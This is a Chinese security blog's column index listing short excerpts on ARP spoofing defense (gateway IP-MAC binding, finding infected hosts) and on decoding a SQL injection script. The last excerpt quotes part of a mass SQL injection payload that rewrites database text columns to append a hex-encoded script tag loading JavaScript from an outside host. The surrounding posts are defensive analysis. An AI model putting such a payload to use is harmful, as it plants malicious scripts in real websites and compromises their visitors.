
Security
pumaboyd
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
[转]网关IP和MAC地址绑定批处理防止Arp欺骗攻击
网关IP和MAC地址绑定批处理防止Arp欺骗攻击 使用方法:新建一个bat文件将下列代码复制进去 修改192.168.1.1 00-18-74-17-c7-80 为自己的网关与网关MAC地址保存 然后双击运行 就可起网关IP和MAC地址绑定的作用。注 不知道自己网关跟MAC地址的朋友 打开 开始 运行 输入 arp -a 就可以知道自己的网关IP和MAC地址 程序代码:@echo off::::...2008-07-07 18:35:00 · 263 阅读 · 0 评论 -
[转]如何查找网内中毒的ARP机器
在“开始” - “程序” - “附件”菜单下调出“命令提示符”。输入并执行以下命令:ipconfig记录网关 IP 地址,即“ Default Gateway ”对应的值,例如“ 59.66.36.1 ”。 再输入并执行以下命令:arp –a在“ Internet Address ”下找到上步记录的网关 IP 地址,记录其对应的物理地址,即“ Physical Address ”值,例如“ 00-...2008-07-07 18:38:00 · 427 阅读 · 0 评论 -
网站安全-ARP欺骗
转载了三篇ARP的文章,目的是想说明ARP相关的网站安全问题。我的理解其实这是一个局域网中毒的问题,但很有可能就会变成你网站问题。因为托管机房的其他机器可能会中ARP病毒。这个时候你的网站就很容易被挂马。最明显的特征就是。页面可以正常显示,但却被添加了一段JS代码。遇到这种问题,你应该采取什么措施呢?1:了解什么是ARP欺骗2:如果查找中毒的ARP机器3:采用正确的方法将IP和MAC地址绑...2008-07-07 18:52:00 · 135 阅读 · 0 评论 -
C# 解密一段SQL注入脚本
大概输入的一段参数exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7...2008-07-21 09:00:00 · 176 阅读 · 0 评论